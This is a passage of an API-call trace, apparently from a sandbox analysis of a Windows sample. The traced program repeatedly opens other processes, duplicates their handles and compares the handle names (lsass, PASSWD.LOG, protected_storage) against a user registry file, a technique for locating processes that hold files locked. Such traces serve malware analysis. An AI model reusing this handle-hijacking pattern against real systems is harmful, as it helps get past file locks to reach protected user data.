WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.928] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.928] CloseHandle (hObject=0x1e4) returned 1 [0163.928] CloseHandle (hObject=0x194) returned 1 [0163.928] CloseHandle (hObject=0x1e8) returned 1 [0163.928] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0163.928] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.928] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.929] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.930] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.930] CloseHandle (hObject=0x1e4) returned 1 [0163.930] CloseHandle (hObject=0x194) returned 1 [0163.930] CloseHandle (hObject=0x1e8) returned 1 [0163.930] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1e8 [0163.930] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.930] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.931] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.931] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.932] CloseHandle (hObject=0x1e4) returned 1 [0163.932] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0163.932] CloseHandle (hObject=0x194) returned 1 [0163.932] CloseHandle (hObject=0x1e8) returned 1 [0163.932] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1e8 [0163.932] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.932] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.933] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.934] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.934] CloseHandle (hObject=0x1e4) returned 1 [0163.934] CloseHandle (hObject=0x194) returned 1 [0163.934] CloseHandle (hObject=0x1e8) returned 1 [0163.934] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0163.934] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.934] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.935] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.936] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.936] CloseHandle (hObject=0x1e4) returned 1 [0163.936] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0163.936] CloseHandle (hObject=0x194) returned 1 [0163.936] CloseHandle (hObject=0x1e8) returned 1 [0163.936] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0163.936] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.936] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.937] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.938] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.938] CloseHandle (hObject=0x1e4) returned 1 [0163.938] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0163.938] CloseHandle (hObject=0x194) returned 1 [0163.938] CloseHandle (hObject=0x1e8) returned 1 [0163.938] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0163.938] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.938] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.939] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.940] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.940] CloseHandle (hObject=0x1e4) returned 1 [0163.940] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0163.940] CloseHandle (hObject=0x194) returned 1 [0163.940] CloseHandle (hObject=0x1e8) returned 1 [0163.940] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0163.940] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.940] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.941] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.942] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.942] CloseHandle (hObject=0x1e4) returned 1 [0163.942] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0163.942] CloseHandle (hObject=0x194) returned 1 [0163.942] CloseHandle (hObject=0x1e8) returned 1 [0163.942] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0163.942] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.942] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.943] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.944] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.944] CloseHandle (hObject=0x1e4) returned 1 [0163.944] CloseHandle (hObject=0x194) returned 1 [0163.944] CloseHandle (hObject=0x1e8) returned 1 [0163.944] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0163.944] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x104, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.944] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.945] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.946] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.946] CloseHandle (hObject=0x1e4) returned 1 [0163.946] _wcsicmp (_Str1="\\scerpc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0163.946] CloseHandle (hObject=0x194) returned 1 [0163.946] CloseHandle (hObject=0x1e8) returned 1 [0163.946] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0163.946] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x108, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.947] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.947] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.948] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.948] CloseHandle (hObject=0x1e4) returned 1 [0163.948] _wcsicmp (_Str1="\\scerpc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0163.948] CloseHandle (hObject=0x194) returned 1 [0163.949] CloseHandle (hObject=0x1e8) returned 1 [0163.949] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0163.949] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.949] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.949] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.950] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.950] CloseHandle (hObject=0x1e4) returned 1 [0163.950] _wcsicmp (_Str1="\\scerpc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0163.950] CloseHandle (hObject=0x194) returned 1 [0163.950] CloseHandle (hObject=0x1e8) returned 1 [0163.950] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0163.950] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.951] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.951] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.952] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.952] CloseHandle (hObject=0x1e4) returned 1 [0163.952] CloseHandle (hObject=0x194) returned 1 [0163.952] CloseHandle (hObject=0x1e8) returned 1 [0163.952] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0163.952] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.952] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.953] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.954] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.954] CloseHandle (hObject=0x1e4) returned 1 [0163.954] CloseHandle (hObject=0x194) returned 1 [0163.954] CloseHandle (hObject=0x1e8) returned 1 [0163.954] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0163.954] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.955] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.955] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.955] CloseHandle (hObject=0x1e4) returned 1 [0163.955] _wcsicmp (_Str1="\\CatalogChangeListener-1d8-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0163.955] CloseHandle (hObject=0x194) returned 1 [0163.956] CloseHandle (hObject=0x1e8) returned 1 [0163.956] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0163.956] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.956] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.956] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.957] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.957] CloseHandle (hObject=0x1e4) returned 1 [0163.957] CloseHandle (hObject=0x194) returned 1 [0163.957] CloseHandle (hObject=0x1e8) returned 1 [0163.957] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0163.957] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.957] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.958] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.959] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.959] CloseHandle (hObject=0x1e4) returned 1 [0163.959] CloseHandle (hObject=0x194) returned 1 [0163.959] CloseHandle (hObject=0x1e8) returned 1 [0163.959] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.959] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.959] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.960] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.961] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.961] CloseHandle (hObject=0x1e4) returned 1 [0163.961] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0163.961] CloseHandle (hObject=0x194) returned 1 [0163.961] CloseHandle (hObject=0x1e8) returned 1 [0163.961] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.961] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.961] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.962] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.963] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.963] CloseHandle (hObject=0x1e4) returned 1 [0163.963] CloseHandle (hObject=0x194) returned 1 [0163.963] CloseHandle (hObject=0x1e8) returned 1 [0163.963] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.963] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.963] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.964] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.965] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.965] CloseHandle (hObject=0x1e4) returned 1 [0163.965] CloseHandle (hObject=0x194) returned 1 [0163.965] CloseHandle (hObject=0x1e8) returned 1 [0163.965] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.965] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.965] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.966] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.967] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.967] CloseHandle (hObject=0x1e4) returned 1 [0163.967] _wcsicmp (_Str1="\\PASSWD.LOG", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 2 [0163.967] CloseHandle (hObject=0x194) returned 1 [0163.967] CloseHandle (hObject=0x1e8) returned 1 [0163.967] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.967] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x354, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.967] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.968] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.968] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.969] CloseHandle (hObject=0x1e4) returned 1 [0163.969] CloseHandle (hObject=0x194) returned 1 [0163.969] CloseHandle (hObject=0x1e8) returned 1 [0163.969] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.969] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x358, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.969] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.970] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.970] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.970] CloseHandle (hObject=0x1e4) returned 1 [0163.970] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0163.970] CloseHandle (hObject=0x194) returned 1 [0163.971] CloseHandle (hObject=0x1e8) returned 1 [0163.971] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.971] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x360, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.971] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.971] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.972] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.972] CloseHandle (hObject=0x1e4) returned 1 [0163.972] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0163.972] CloseHandle (hObject=0x194) returned 1 [0163.973] CloseHandle (hObject=0x1e8) returned 1 [0163.973] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.973] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x390, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.973] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.974] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.974] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.974] CloseHandle (hObject=0x1e4) returned 1 [0163.975] CloseHandle (hObject=0x194) returned 1 [0163.975] CloseHandle (hObject=0x1e8) returned 1 [0163.975] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.975] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.975] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.975] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.976] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.976] CloseHandle (hObject=0x1e4) returned 1 [0163.976] _wcsicmp (_Str1="\\protected_storage", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 2 [0163.976] CloseHandle (hObject=0x194) returned 1 [0163.977] CloseHandle (hObject=0x1e8) returned 1 [0163.977] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.977] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.977] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.978] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.979] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.979] CloseHandle (hObject=0x1e4) returned 1 [0163.979] _wcsicmp (_Str1="\\protected_storage", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 2 [0163.979] CloseHandle (hObject=0x194) returned 1 [0163.979] CloseHandle (hObject=0x1e8) returned 1 [0163.979] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, 